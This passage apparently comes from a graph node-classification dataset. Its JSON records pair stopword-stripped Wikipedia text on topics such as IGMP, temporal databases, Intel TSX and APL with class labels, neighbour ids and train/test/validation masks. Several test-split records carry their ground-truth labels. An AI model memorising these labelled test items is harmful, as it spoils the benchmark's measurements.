    "text": "Internet_Group_Management_Protocol:internet group management protocol internet group management protocol igmp communications protocol used hosts adjacent routers ipv4 networks establish multicast group memberships igmp integral part ip multicast igmp used one-to-many networking applications online streaming video gaming allows efficient use resources supporting types applications igmp used ipv4 networks multicast management ipv6 networks handled multicast listener discovery mld part icmpv6 contrast igmp bare ip encapsulation network designed deliver multicast service using igmp might use basic architecture igmp operates host local multicast router switches featuring igmp snooping derive useful information observing igmp transactions protocol independent multicast pim used local remote multicast routers direct multicast traffic hosts sending multicasts hosts registered igmp receive igmp operates network layer network management protocols like icmp igmp protocol implemented particular host within router host requests membership group local router router listens requests periodically sends subscription queries single router per subnet elected perform querying function multilayer switches include igmp querier capability allow igmp snooping features work absence ip multicast capability larger network igmp vulnerable attacks firewalls commonly allow user disable needed three versions igmp igmpv1 defined igmpv2 defined igmpv3 initially defined updated defines igmpv3 mldv2 igmpv2 improves igmpv1 adding ability host signal desire leave multicast group igmpv3 improves igmpv2 supporting source-specific multicast introduces membership report aggregation versions backwards compatible router supporting igmpv3 support clients running igmpv1 igmpv2 igmpv3 igmpv1 uses query-response model queries sent 224.0.0.1 membership reports sent group multicast address igmpv2 accelerates process leaving group adjusts timeouts leave-group messages sent 224.0.0.2 group-specific query introduced group-specific queries sent group multicast address means routers select igmp querier network introduced igmpv3 introduces source-specific multicast capability membership reports sent 224.0.0.22 several types igmp messages igmp messages carried bare ip packets ip protocol number 2 similar internet control message protocol transport layer used igmp messaging message sent using following ip destination addresses freebsd linux windows operating systems support igmp host side",
    "neighbors": [
      10242,
      1030,
      9225,
      8211,
      5653,
      6681,
      6682,
      10270,
      10271,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6723,
      11332,
      8265,
      8266,
      4687,
      6735,
      10341,
      10344,
      3695,
      4723,
      2679,
      4729,
      5251,
      9860,
      649,
      9868,
      6797,
      3218,
      9365,
      11413,
      152,
      2206,
      3742,
      9380,
      9381,
      3751,
      3752,
      172,
      10924,
      6318,
      9909,
      4793,
      7865,
      4797,
      702,
      7364,
      8905,
      1229,
      5843,
      10461,
      7391,
      3297,
      2797,
      751,
      8432,
      8946,
      5875,
      3322,
      9987,
      3847,
      1297,
      10005,
      5402,
      5405,
      9511,
      7983,
      7984,
      10035,
      823,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      10058,
      849,
      1876,
      2904,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      1893,
      871,
      11112,
      361,
      367,
      3444,
      891,
      6524,
      2431,
      11647,
      1411,
      10115,
      6541,
      7570,
      5531,
      10144,
      10659,
      933,
      2983,
      6577,
      2996,
      10171,
      3006,
      9670,
      8654,
      6613,
      8669,
      8670,
      10723,
      10727,
      3564,
      4589,
      6651,
      3580,
      5118,
      4095
    ],
    "mask": "None"
  },
  {
    "node_id": 2510,
    "label": 3,
    "text": "Thunder_Blade:thunder blade game released standard stand-up arcade cabinet introduced use force feedback joystick vibrates gameplay sit-down unit also available replacing force feedback seat moves tandem joystick versions game later released master system amiga amstrad cpc atari st commodore 64 dos msx turbografx-16 sharp x68000 zx spectrum nintendo 3ds remake released 3d classic japan august 20 2014 north america europe may 14 2015 australia july 2 2015 follow-up super thunder blade released exclusively sega mega drive/genesis game plot setting resembles 1983 film 1984 tv series blue thunder player controls helicopter gunship using chain gun missiles destroy enemy tanks helicopters etc. save home country levels top-down third-person perspective view boss levels top-down view game well received sinclair saying thunder blade probably game took money arcades summer probably one eagerly awaited coin-op conversions game earned golden joystick console award 1988-1989",
    "neighbors": [
      9166,
      9006
    ],
    "mask": "None"
  },
  {
    "node_id": 2511,
    "label": 7,
    "text": "TerraNet_AB:terranet ab terranet ab company delivers mobile telephony data services via peer-to-peer mobile mesh network handsets light infrastructure headquartered sweden currently led ceo pär-olof johannesson system uses unit within range additional network node allowing voice data transmission via radio frequency rather conventional cell sites terranet concept originally developed way bring mobile coverage under-served geographies populations technology much broader market terranet phone switched begins look phones within effective range finds connects extends radio network actual number dialled handset uses checks see person called within range handsets network call goes detractors questioned terranet lack clear business model though device manufacturers appear interested efforts noted thought leaders voice ip alexander straub truphone identified mesh networks next big thing telecoms terranet ab founded 2004 inventor technology anders carlius serial entrepreneur lund skåne county carlius came background chip manufacturing switchcore also worked web portal operator spray network served first ceo 2010 since inception terranet headquartered lund ideon science park best known home ericsson radio systems carlius says came idea travelling safari east africa wife emma first extensive pilot project carried autumn 2005 farming co-operative botswana trials included agreement indian operator bharat sanchar nigam test 50 handsets late 2012 number pilots south america year development engineer conny said main prerogative miniaturise terranet credit card-sized circuit could installed mobile handset company prestigious red herring magazine award april 2008 carlius received number honours work promoting entrepreneurship sweden including leadership awards 2005 rapidus 2008 jönköping international business school terranet supported private investors july 2013 emerged serial entrepreneur dan olofsson bought 12.5 stake ceo pär-olof johannesson acknowledged oloffson investment means lot company well-known operator heavy industrial background knows industry inside",
    "neighbors": [
      8640,
      10021
    ],
    "mask": "Test"
  },
  {
    "node_id": 2512,
    "label": 1,
    "text": "Temporal_database:temporal database temporal database stores data relating time instances offers temporal data types stores information relating past present future time temporal databases could uni-temporal bi-temporal tri-temporal specifically temporal aspects usually include valid time transaction time decision time uni-temporal database one axis time either validity range system time range bi-temporal database two axes time tri-temporal database three axes time approach introduces additional complexities temporal databases contrast current databases confused currently available databases store facts believed true current time temporal databases support managing accessing temporal data providing one following features development sql attendant use real-life applications database users realized added date columns key fields issues arose example table primary key attributes adding date primary key track historical changes lead creation rows intended deletes must also handled differently rows tracked way 1992 issue recognized standard database theory yet resolving issue neither then-newly formalized sql-92 standard richard snodgrass proposed 1992 temporal extensions sql developed temporal database community response proposal committee formed design extensions 1992 edition sql standard ansi x3.135.-1992 iso/iec 9075:1992 extensions known tsql2 developed 1993 committee late 1993 snodgrass presented work group responsible american national standard database language sql ansi technical committee x3h2 known ncits h2 preliminary language specification appeared march 1994 acm sigmod record based responses specification changes made language definitive version tsql2 language specification published september 1994 attempt made incorporate parts tsql2 new sql standard called sql3 parts tsql2 included new substandard sql3 iso/iec 9075-7 called sql/temporal tsql2 approach heavily criticized chris date hugh darwen iso project responsible temporal support canceled near end 2001 december 2011 iso/iec 9075 database language part 2 sql/foundation included clauses table definitions define application-time period tables valid time tables system-versioned tables transaction time tables system-versioned application-time period tables bitemporal tables substantive difference tsql2 proposal adopted sql:2011 hidden columns sql:2011 treatment new data type intervals instead two date timestamp columns bound together using codice_1 declaration another difference replacement controversial prefix statement modifiers tsql2 set temporal predicates features standard related temporal databases automatic time period splitting temporal primary keys temporal referential integrity temporal predicates allen interval algebra time-sliced sequenced queries illustration consider following short biography fictional man john doe store life john doe current non-temporal database use table person name address order simplify name defined primary key person john father officially reported birth april 4 1975 date smallville official inserted following entry database codice_2 note date stored database graduation john moves forgets register new address john entry database changed december 27 1994 finally reports bigtown official updates address database person table contains codice_3 note information john living smallville overwritten longer possible retrieve information database official accessing database december 28 1994 would told john lives bigtown technically database administrator ran query codice_4 december 26 1994 result would codice_5 running query 2 days later would result codice_6 death database would state lived bigtown april 1 2001 coroner deletes john doe entry database running query would return result valid time time fact true real world valid time period may past span current time occur future example record valid time person table two fields added valid-from valid-to specify period person address valid real world april 4 1975 john father registered son birth official inserts new entry database stating john lives smallville april 3 note although data inserted 4th database states information valid since 3rd official yet know john move another place valid-to field set infinity ∞ entry database december 27 1994 john reports new address bigtown living since august 26 1994 new database entry made record fact original entry codice_7 deleted valid-to attribute updated reflect known john stopped living smallville august 26 1994 database contains two entries john doe john dies current entry database updated stating john live bigtown longer database looks like transaction time records time period database entry accepted correct enables queries show state database given time transaction time periods occur past current time transaction time table records never deleted new records inserted existing ones updated setting transaction end time show longer current enable transaction time example two fields added person table transaction-from transaction-to transaction-from time transaction made transaction-to time transaction superseded may infinity yet superseded makes table bitemporal table happens person address stored database incorrect suppose official accidentally entered wrong address date suppose person lied address reason upon discovery error officials update database correct information recorded example 1-jun-1995 3-sep-2000 john doe moved beachy avoid paying beachy exorbitant residence tax never reported authorities later tax investigation discovered 2-feb-2001 fact beachy dates record fact existing entry john living bigtown must split two separate records new record inserted recording residence beachy database would appear follows however leaves record database ever claimed lived bigtown 1-jun-1995 3-sep-2000 might important know auditing reasons use evidence official tax investigation transaction time allows capturing changing knowledge database since entries never directly modified deleted instead entry records entered superseded logically deleted database contents look like database records happened real world also officially recorded different times bitemporal model contains valid transaction time provides historical rollback information historical information e.g john live 1992 provided valid time rollback e.g 1992 database believe john lived provided transaction time answers example questions may database may altered since 1992 causing queries produce different results valid time transaction time single fact example consider temporal database storing data 18th century valid time facts somewhere 1701 1800 transaction time would show facts inserted database example january 21 1998 challenging issue support temporal queries transaction time database evolving schema order achieve perfect archival quality key importance store data schema version first appeared however even simple temporal query rewriting history attribute value would required manually rewritten schema versions potentially hundreds case mediawiki process would particularly taxing users proposed solution provide automatic query rewriting although part sql similar standards approaches minimize complexities schema evolution following implementations provide temporal features relational database management system rdbms non-relational nosql database management systems provide temporal features including following sometimes slowly changing dimension used method",
    "neighbors": [
      2688,
      4736,
      4738,
      5632,
      10628,
      8201,
      10389,
      11030,
      4376,
      5151,
      9631,
      1697,
      5794,
      7080,
      10413,
      9397,
      3001,
      4155,
      7868,
      9147,
      11324,
      2369,
      11457,
      6085,
      2901,
      9557,
      1751,
      7767,
      11098,
      8539,
      7650,
      8291,
      9828,
      10340,
      10471,
      8683,
      6131,
      1146,
      6395,
      3196
    ],
    "mask": "Test"
  },
  {
    "node_id": 2513,
    "label": 9,
    "text": "Zathura_(document_viewer):zathura document viewer zathura free plugin-based document viewer plugins available pdf via poppler mupdf postscript djvu epub written lightweight controlled vi-like keybindings zathura customizability makes well-liked many linux users zathura official packages available arch linux debian fedora gentoo openbsd opensuse source mage gnu/linux ubuntu unofficial macos package provided macports zathura named 2005 film development zathura began 12 august 2009 18 september 2009 version 0.0.1 announced arch linux community zathura official arch linux package since april 2010 year end july imported source mage test grimoire official debian package since least 2011 part debian squeeze zathura automatically reloads documents working compiled documents written latex zathura refresh output whenever compilation takes place zathura option enabling inverse search using synctex zathura adjust document best-fit fit width rotate pages view pages side-by-side fullscreen mode pages also recolored black background white foreground zathura search text copy text primary x selection supports bookmarks open encrypted files behavior appearance zathura customized using configuration file zathura ability execute external shell commands opened tabs using",
    "neighbors": [
      2181,
      2886,
      9418,
      7435,
      1295,
      7983,
      3828,
      5397,
      8628,
      2045,
      1822
    ],
    "mask": "Test"
  },
  {
    "node_id": 2514,
    "label": 3,
    "text": "Transactional_Synchronization_Extensions:transactional synchronization extensions transactional synchronization extensions tsx-ni extension x86 instruction set architecture isa adds hardware transactional memory support speeding execution multi-threaded software lock elision according different benchmarks tsx provide around 40 faster applications execution specific workloads 4–5 times database transactions per second tps tsx documented intel february 2012 debuted june 2013 selected intel microprocessors based haswell microarchitecture haswell processors 45xx well r-series k-series unlocked multiplier skus support tsx august 2014 intel announced bug tsx implementation current steppings haswell haswell-e haswell-ep early broadwell cpus resulted disabling tsx feature affected cpus via microcode update 2016 side-channel timing attack found abusing way tsx handles transactional faults i.e page faults order break kaslr major operating systems support tsx emulation provided part intel software development emulator also experimental support tsx emulation qemu fork tsx provides two software interfaces designating code regions transactional execution hardware lock elision hle instruction prefix-based interface designed backward compatible processors without tsx support restricted transactional memory rtm new instruction set interface provides greater flexibility programmers tsx enables optimistic execution transactional code regions hardware monitors multiple threads conflicting memory accesses aborting rolling back transactions successfully completed mechanisms provided software detect handle failed transactions words lock elision transactional execution uses memory transactions fast path possible slow fallback path still normal lock hardware lock elision hle adds two new instruction prefixes codice_1 codice_2 two prefixes reuse opcodes existing codice_3 codice_4 prefixes codice_5 codice_6 processors support tsx codice_3 codice_4 prefixes ignored instructions codice_1 codice_2 valid thus enabling backward compatibility codice_1 prefix hint used following instructions explicit codice_12 prefix codice_13 codice_14 codice_15 codice_16 codice_17 codice_18 codice_19 codice_20 codice_21 codice_22 codice_23 codice_24 codice_25 codice_26 codice_27 codice_28 codice_29 codice_30 codice_30 instruction used without codice_12 prefix well codice_2 prefix hint used instructions listed codice_34 codice_35 instructions hle allows optimistic execution critical section eliding write lock lock appears free threads failed transaction results execution restarting codice_1-prefixed instruction treating instruction codice_1 prefix present restricted transactional memory rtm alternative implementation hle gives programmer flexibility specify fallback code path executed transaction successfully executed rtm adds three new instructions codice_38 codice_39 codice_40 codice_38 codice_39 instructions mark start end transactional code region codice_40 instruction explicitly aborts transaction transaction failure redirects processor fallback code path specified codice_38 instruction abort status returned codice_45 register tsx provides new codice_46 instruction returns whether processor executing transactional region intel tsx specification describes transactional memory exposed programmers withholds details actual transactional memory implementation intel specifies developer optimization manuals haswell maintains read-sets write-sets granularity cache line tracking addresses l1 data cache processor intel also states data conflicts detected cache coherence protocol haswell l1 data cache associativity eight means implementation transactional execution writes nine distinct locations mapping cache set abort however due micro-architectural implementations mean fewer accesses set guaranteed never abort additionally cpu configurations hyper-threading technology l1 cache shared two threads core operations sibling logical processor core cause evictions independent research points haswell ’ transactional memory likely deferred update system using per-core caches transactional data register checkpoints words haswell likely use cache-based transactional memory system much less risky implementation choice hand intel skylake later may combine cache-based approach memory ordering buffer mob purpose possibly also providing multi-versioned transactional memory amenable speculative multithreading august 2014 intel announced bug exists tsx implementation haswell haswell-e haswell-ep early broadwell cpus resulted disabling tsx feature affected cpus via microcode update bug fixed f-0 steppings vpro-enabled core m-5y70 broadwell cpu november 2014 bug found reported diploma thesis school electrical computer engineering national technical university athens",
    "neighbors": [
      2821,
      7173,
      4491,
      4108,
      4237,
      6924,
      5649,
      7313,
      6038,
      7446,
      9111,
      9369,
      9500,
      3615,
      5883,
      4389,
      2088,
      9391,
      8120,
      8506,
      2237,
      1085,
      8125,
      8126,
      833,
      7234,
      9541,
      3142,
      1998,
      5326,
      977,
      3537,
      8273,
      2516,
      5844,
      9428,
      7387,
      4444,
      8795,
      3294,
      2655,
      1119,
      1122,
      7783,
      1000,
      10985,
      4204,
      9964,
      5358,
      8815,
      8944,
      9582,
      499,
      1399,
      9976,
      4217,
      4603,
      10620
    ],
    "mask": "Train"
  },
  {
    "node_id": 2515,
    "label": 4,
    "text": "Novabackup:novabackup novabackup developed novastor data protection software enables smb users backup recover mission critical data across hybrid physical virtual machines novabackup designed work microsoft windows operating systems offering local online file backups disaster recovery image backups novabackup uses proprietary file format uses .nbd file extension backwards compatible meaning backups older versions novabackup version 8 restored latest version software version 7 8 backups still restored file extensions need updated .nbd multiple novabackup editions available versions built smb users support backups pcs laptops servers including support exchange/sql virtual machines novabackup software includes novacare premium support email/phone-in technical support maintenance upgrades novastor partnered buffalo offering novabackup software included linkstation family consumer nas solutions terastation family business-class nas solutions release change log novabackup starting version 13.0 current novabackup release log",
    "neighbors": [
      929,
      2339,
      3366,
      6153,
      3629,
      1358,
      9655,
      1049
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2516,
    "label": 3,
    "text": "Intel_Turbo_Boost:intel turbo boost intel turbo boost intel trade name feature automatically raises certain processors operating frequency thus performance demanding tasks running turbo-boost-enabled processors core i5 core i7 core i9 xeon series manufactured since 2008 particularly based nehalem sandy bridge later microarchitectures frequency accelerated operating system requests highest performance state processor processor performance states defined advanced configuration power interface acpi specification open standard supported major operating systems additional software drivers required support technology design concept behind turbo boost commonly referred dynamic overclocking workload processor calls faster performance processor clock try increase operating frequency regular increments required meet demand increased clock rate limited processor power current thermal limits number cores currently use maximum frequency active cores frequency increases occur increments 133 mhz nehalem processors 100 mhz sandy bridge ivy bridge haswell skylake processors electrical thermal limits exceeded operating frequency automatically decreases decrements 133 100 mhz processor operating within design limits turbo boost 2.0 introduced 2011 sandy bridge microarchitecture intel turbo boost max 3.0 introduced 2016 broadwell-e microarchitecture intel november 2008 white paper discusses turbo boost technology new feature incorporated nehalem-based processors released month similar feature called intel dynamic acceleration ida available many core 2 based centrino platforms feature receive marketing treatment given turbo boost intel dynamic acceleration dynamically changed core frequency function number active cores operating system instructed one active cores enter c3 sleep state using advanced configuration power interface acpi active core dynamically accelerated higher frequency intel turbo boost technology monitor gui utility could used monitor turbo boost utility reached end-of-life state longer supporting intel processors released q2 2013 longer available",
    "neighbors": [
      3973,
      4491,
      4108,
      398,
      5649,
      7313,
      5523,
      4886,
      8855,
      9369,
      10139,
      9500,
      3882,
      7983,
      4017,
      2237,
      8125,
      833,
      6339,
      9541,
      3403,
      1998,
      3537,
      2514,
      5073,
      10966,
      7387,
      4444,
      3294,
      7783,
      1000,
      4204,
      4334,
      9582,
      1137,
      630,
      4217,
      5883,
      10620
    ],
    "mask": "None"
  },
  {
    "node_id": 2517,
    "label": 3,
    "text": "AVR32:avr32 avr32 32-bit risc microcontroller architecture produced atmel microcontroller architecture designed handful people educated norwegian university science technology including lead designer øyvind strøm cpu architect erik renno atmel norwegian design center instructions executed single-cycle multiply–accumulate unit perform 32-bit × 16-bit 48-bit arithmetic operation two cycles result latency issued per cycle resemble 8-bit avr microcontroller family even though designed atmel norway trondheim debug-tools similar support avr32 dropped linux kernel 4.12 atmel switched mostly variants arm architecture avr32 least two micro-architectures avr32a avr32b differ instruction set architecture register configurations use caches instructions data avr32a cpu cores inexpensive applications provide dedicated hardware registers shadowing register file status return address interrupts saves chip area expense slower interrupt-handling avr32b cpu cores designed fast interrupts dedicated registers hold values interrupts exceptions supervisor calls avr32b cores also support java virtual machine hardware avr32 instruction set 16-bit compact 32-bit extended instructions similar e.g arm several specialized instructions found older armv5 armv6 mips32 several u.s. patents filed avr32 isa design platform like avr 8-bit microcontroller architecture avr32 designed high code density packing much function instructions fast instructions clock cycles atmel used independent benchmark consortium eembc benchmark architecture various compilers consistently outperformed armv5 16-bit thumb code armv5 32-bit arm code much 50 code-size 3× performance atmel says picopower avr32 at32uc3l consumes less 0.48 mw/mhz active mode claimed time used less power 32-bit cpu march 2015 claim new cortex-m0+-based microcontrollers using arm holdings arm architecture instruction set broken ultra-low power performance barriers date avr32 architecture used atmel products 2006 atmel launched avr32a avr32 ap7 core 7-stage pipelined cache-based design platform ap7000 implements avr32b architecture supports simd single instruction multiple data dsp digital signal processing instructions risc instruction-set addition java hardware acceleration includes memory management unit mmu supports operating systems like linux early 2009 rumored ap7200 follow-on processor held back resources going chips 2007 atmel launched second avr32 avr32 uc3 core designed microcontrollers using on-chip flash memory program storage running without mmu memory management unit avr32 uc3 core uses three-stage pipelined harvard architecture specially designed optimize instruction fetches on-chip flash memory avr32 uc3 core implements avr32a architecture shares instruction set architecture isa ap7 sibling differs including optional simd instructions java support shares 220 instructions avr32b isa features atomic bit manipulation control on-chip peripherals general purpose i/os fixed point dsp arithmetic implementations combined compatible set peripheral controllers buses first seen at91sam arm-based platforms peripherals first seen ap7000 high speed usb peripheral controller standalone dma controller appeared later updated arm9 platforms arm cortex-m3 based products avr32 cores include nexus class 2+ based on-chip debug framework build jtag uc3 core announced electronica 2010 munich germany november 10 2010 first 32-bit avr microcontroller optional floating-point unit april 10 2012 atmel announced end life ap7 core devices april 4 2013 devicename ends *au audio version allow execution atmel licensed audio firmware ips devicename ends *s includes aes crypto module series low-power uc3d embeds sleepwalking technology allows peripheral wake device sleep mode",
    "neighbors": [
      7170,
      8450,
      1798,
      6925,
      1170,
      1298,
      7445,
      5785,
      9371,
      8861,
      11424,
      5922,
      2339,
      3493,
      4773,
      6311,
      8487,
      9638,
      682,
      4269,
      9391,
      2224,
      4144,
      11314,
      7604,
      1461,
      1462,
      823,
      9911,
      6207,
      10945,
      7234,
      7235,
      6084,
      3014,
      3142,
      3911,
      9928,
      9932,
      6607,
      9685,
      2137,
      4569,
      7774,
      10985,
      9964,
      5358,
      11374,
      5872,
      8048,
      8944,
      757,
      630,
      2039,
      249,
      3451,
      8700,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 2518,
    "label": 0,
    "text": "Robert_Mercer:robert mercer robert leroy mercer born july 11 1946 american computer scientist developer early artificial intelligence co-ceo renaissance technologies hedge fund mercer played key role brexit campaign donating data analytics services nigel farage also major funder organizations supporting right-wing political causes united states breitbart news donald trump 2016 campaign president principal benefactor make america number 1 super pac november 2017 mercer announced would step renaissance technologies sell stake breitbart news daughters mercer grew new mexico developed early interest computers 1964 attended national youth science camp west virginia learned program donated ibm computer went get bachelor degree physics mathematics university new mexico working degree job air force weapons laboratory kirtland air force base writing programs though felt produced good work felt optimized later said experience left jaundiced view government-funded research earned ph.d. computer science university illinois urbana–champaign 1972 mercer joined ibm research fall 1972 worked thomas j. watson research center yorktown new york helped develop brown clustering statistical machine translation technique part speech recognition translation research program led frederick jelinek lalit bahl june 2014 mercer received association computational linguistics lifetime achievement award work 1993 mercer joined hedge fund renaissance technologies recruited executive nick patterson founder renaissance james harris simons quantitative analyst preferred hire mathematicians computer scientists physicists rather business school students financial analysts mercer former colleague ibm peter brown became co-ceos renaissance simons retired 2009 renaissance main fund medallion earned 39 per year average 1989 2006 bipartisan senate panel estimated 2014 medallion investors underpaid taxes 6.8 billion decade masking short-term gains long-term returns 2014 renaissance managed 25 billion assets november 2017 mercer announced would stepping position renaissance technologies decision taken hedge fund faced backlash mercer political activism mercer appears director eight bermuda companies paradise papers appear used legally avoid us taxes 2015 washington post called mercer one ten influential billionaires politics since 2006 mercer donated 34.9 million republican political campaigns us mercer given 750,000 club growth 2 million american crossroads 2.5 million freedom partners action fund 2010 financially supported fringe biochemist art robinson unsuccessful efforts unseat peter defazio oregon 4th congressional district 2013-2014 election cycle mercer donated fourth largest amount money among individual donors second among republican donors mercer joined koch brothers ’ conservative political donor network 2010 citizens united v. fec mercer daughter rebekah mercer decided establish political foundation mercer family foundation run rebekah donated variety conservative causes mercer donated heritage foundation cato institute media research center reclaim new york gai 2013 mercer shown data former jimmy carter pollster patrick caddell critical top democrats commissioned research caddell showed voters becoming alienated political parties mainstream candidates mercer main financial backer jackson hole summit conference took place wyoming august 2015 advocate gold standard also supported doctors disaster preparedness fred kelly grant idaho activist encourages legal challenges environmental laws campaign death penalty nebraska funded ads new york critical so-called ground-zero mosque according associates interviewed bloomberg mercer concerned monetary banking systems united states believes danger government meddling mercer major source funds breitbart news gave least 10 million media outlet according newsweek 2015 mercer also gave 400,000 black americans better future conservative think tank led raynard jackson since 2017 mercer donated 87,100 super pac mercer activist campaign united kingdom end membership european union also known brexit andy wigmore communications director leave.eu said mercer donated services data analytics firm cambridge analytica nigel farage head united kingdom independence party ukip firm able advise leave.eu ability harvest data people facebook profiles order target individualized persuasive messages vote brexit reported cambridge analytica also undisclosed links canadian digital firm aggregateiq also played pivotal role domenic cummings voteleave campaign delivered estimated one billion individually curated targeted adverts voters lead brexit referendum contravention established voting rules voteleave leave.eu inform uk electoral commission donation despite fact law demands donations valued £7,500 must reported 2018 electoral commission found voteleave campaign guilty breaking electoral law january 2016 mercer biggest single donor 2016 u.s. presidential race june 2016 ranked 1 donor federal candidates 2016 election cycle donated 2 million john r. bolton super pac 668,000 republican national committee mercer major financial supporter 2016 presidential campaign ted cruz contributing 11 million super pac associated candidate mercer major supporter donald trump 2016 campaign president mercer daughter rebekah helped get steve bannon kellyanne conway senior roles trump campaign rebekah worked conway cruz super-pac keep promise 2016 republican primaries mercer also financed super pac make america number one supported trump campaign nick patterson former colleague mercer said 2017 trump would elected without mercer support mercer said civil rights act 1964 landmark federal statute arising civil rights movement 1960s major mistake 2017 david magerman former renaissance employee alleged lawsuit mercer said african americans economically better civil rights movement white racists longer existed united states racists remaining black racists mercer portrayed actor aden gillett 2019 hbo channel 4 produced drama entitled mercer wife diana lynne dean three daughters jennifer jenji rebekah bekah heather sue rebekah runs mercer family foundation three mercer daughters formerly owned bakery called ruby et violette mercer plays competitive poker owns ho scale model railroad 2009 mercer filed suit raildreams custom model railroad design alleging raildreams overcharged 2 million mercer lives owl nest mansion head harbor new york commissioned series yachts named sea owl recent one 203 feet 62 metres length pirate-themed playroom mercer grandchildren chandelier venetian glass florida mercer built large stable horse riding center acquired one country largest collections machine guns historical firearms including weapon arnold schwarzenegger wielded terminator 2013 mercer sued several members household staff accused docking wages failing pay overtime compensation lawsuit settled according lawyer represented staff members mercer net worth estimated hundreds millions dollars often referred billionaire",
    "neighbors": [
      679,
      2602,
      7724,
      1783,
      10557
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2519,
    "label": 2,
    "text": "APL_(programming_language):apl programming language apl named book programming language programming language developed 1960s kenneth e. iverson central datatype multidimensional array uses large range special graphic symbols represent functions operators leading concise code important influence development concept modeling spreadsheets functional programming computer math packages also inspired several programming languages mathematical notation manipulating arrays developed kenneth e. iverson starting 1957 harvard university 1960 began work ibm developed notation adin falkoff published book programming language 1962 preface states premise notation used inside ibm short research reports computer systems burroughs b5000 stack mechanism stack machines versus register machines evaluated ibm upcoming computers iverson also used notation draft chapter programming language written book writing fred brooks automatic data processing would published 1963 1979 iverson received turing award work apl early 1962 first attempt use notation describe complete computer system happened falkoff discussed william c. carter work standardize instruction set machines later became ibm system/360 family 1963 herbert hellerman working ibm systems research institute implemented part notation ibm 1620 computer used students special high school course calculating transcendental functions series summation students tested code hellerman lab implementation part notation called personalized array translator pat 1963 falkoff iverson edward h. sussenguth jr. working ibm used notation formal description ibm system/360 series machine architecture functionality resulted paper published ibm systems journal 1964 published team turned attention implementation notation computer system one motivations focus implementation interest john l. lawrence new duties science research associates educational company bought ibm 1964 lawrence asked iverson group help use language tool develop use computers education lawrence m. breed philip s. abrams stanford university joined team ibm research continued prior work implementation programmed fortran iv part notation done ibm 7090 computer running ibsys operating system work finished late 1965 later named ivsys iverson system basis implementation described detail abrams stanford university technical report interpreter iverson notation 1966 academic aspect formally supervised niklaus wirth like hellerman pat system earlier implementation include apl character set used special english reserved words functions operators system later adapted time-sharing system november 1966 reprogrammed ibm system/360 model 50 computer running time sharing mode used internally ibm key development ability use apl effectively wide use cathode ray tube crt terminals development special ibm selectric typewriter interchangeable typing element special apl characters used paper printing terminal workstations using selectric typewriter typing element mechanism ibm 1050 ibm 2741 terminal keycaps could placed normal keys show apl characters would entered typed key struck first time programmer could type see proper apl characters used iverson notation forced use awkward english keyword representations falkoff iverson special apl selectric typing elements 987 988 designed late 1964 although apl computer system available use iverson cited falkoff inspiration idea using ibm selectric typing element apl character set many apl symbols even apl characters selectric typing element still typed over-striking two extant element characters example grade character made delta shift-h sheffer stroke shift-m necessary apl character set much larger 88 characters allowed typing element even letters restricted upper-case capitals first apl interactive login creation apl workspace 1966 larry breed using ibm 1050 terminal ibm mohansic labs near thomas j. watson research center home apl yorktown heights new york ibm chiefly responsible introducing apl marketplace apl first available 1967 ibm 1130 apl\\1130 would run little 8k 16-bit words memory used dedicated 1 megabyte hard disk apl gained foothold mainframe timesharing systems late 1960s early 1980s part would support multiple users lower-specification systems dynamic address translation hardware additional improvements performance selected ibm system/370 mainframe systems included apl assist microcode support apl execution included processor firmware distinct implemented entirely higher-level software somewhat later suitably performing hardware finally growing available mid- late-1980s many users migrated applications personal computer environment early ibm apl interpreters ibm 360 ibm 370 hardware implemented multi-user management instead relying host services thus timesharing systems first introduced 1966 apl\\360 system multi-user interpreter ability programmatically communicate operating system information setting interpreter system variables done special privileged i-beam functions using monadic dyadic operations 1973 ibm released apl.sv continuation product offered shared variables means access facilities outside apl system operating system files mid-1970s ibm mainframe interpreter even adapted use ibm 5100 desktop computer small crt apl keyboard small computers time offered basic 1980s vsapl program product enjoyed wide use conversational monitor system cms time sharing option tso vspc music/sp cics users 1973-1974 patrick e. hagerty directed implementation university maryland apl interpreter 1100 line sperry univac 1100/2200 series mainframe computers time sperry nothing 1974 student alan stebbens assigned task implementing internal function 1960s 1970s several timesharing firms arose sold apl services using modified versions ibm apl\\360 interpreter north america better-known ones i. p. sharp associates scientific time sharing corporation stsc time sharing resources tsr computer company tcc compuserve also entered market 1978 apl interpreter based modified version digital equipment corp carnegie mellon ran dec ki kl 36-bit machines compuserve apl available commercial market consumer information service advent first less expensive mainframes ibm 4300 later personal computer mid-1980s timesharing industry gone sharp apl available i. p. sharp associates first timesharing service 1960s later program product starting around 1979 sharp apl advanced apl implementation many language extensions packages ability put one objects single variable file system nested arrays shared variables apl interpreters available mainframe mini-computer manufacturers also notably burroughs control data corporation cdc data general digital equipment corporation dec harris hewlett-packard hp siemens ag xerox others garth foster syracuse university sponsored regular meetings apl implementers community syracuse minnowbrook conference center blue mountain lake new york later years eugene mcdonnell organized similar meetings asilomar conference grounds near monterey california pajaro dunes near watsonville california sigapl special interest group association computing machinery continues support apl community microcomputers became available mid 1970s onwards basic became dominant programming language nevertheless microcomputers provided apl instead first intel 8008-based mcm/70 released 1974 primarily used education another machine time videobrain family computer released 1977 supplied dialect apl called apl/s commodore superpet introduced 1981 included apl interpreter developed university waterloo 1976 bill gates claimed open letter hobbyists microsoft corporation implementing apl intel 8080 motorola 6800 little incentive make available hobbyists software piracy never released starting early 1980s ibm apl development leadership jim brown implemented new version apl language contained primary enhancement concept nested arrays array contain arrays new language features facilitated integrating nested arrays program workflow ken iverson longer control development apl language left ibm joined i. p. sharp associates one major contributions directing evolution sharp apl accord vision vendors busy developing apl interpreters new hardware notably unix-based microcomputers apl2 almost always standard chosen new apl interpreter developments even today apl vendors users cite apl2 compatibility selling point products apl2 ibm mainframe computers still available ibm cites use problem solving system design prototyping engineering scientific computations expert systems teaching mathematics subjects visualization database access first available cms tso 1984 apl2 workstation edition windows os/2 aix linux solaris followed much later early 1990s various implementations apl aplx dyalog et al. include extensions object-oriented programming support .net framework xml-array conversion primitives graphing operating system interfaces lambda calculus expressions apl formed basis influenced following languages apl criticized praised choice unique non-standard character set learn become ardent adherents suggesting weight behind iverson idea notation used make difference 1960s 1970s terminal devices even display monitors could reproduce apl character set popular ones employed ibm selectric print mechanism used special apl type element one early apl line terminals line-mode operation full 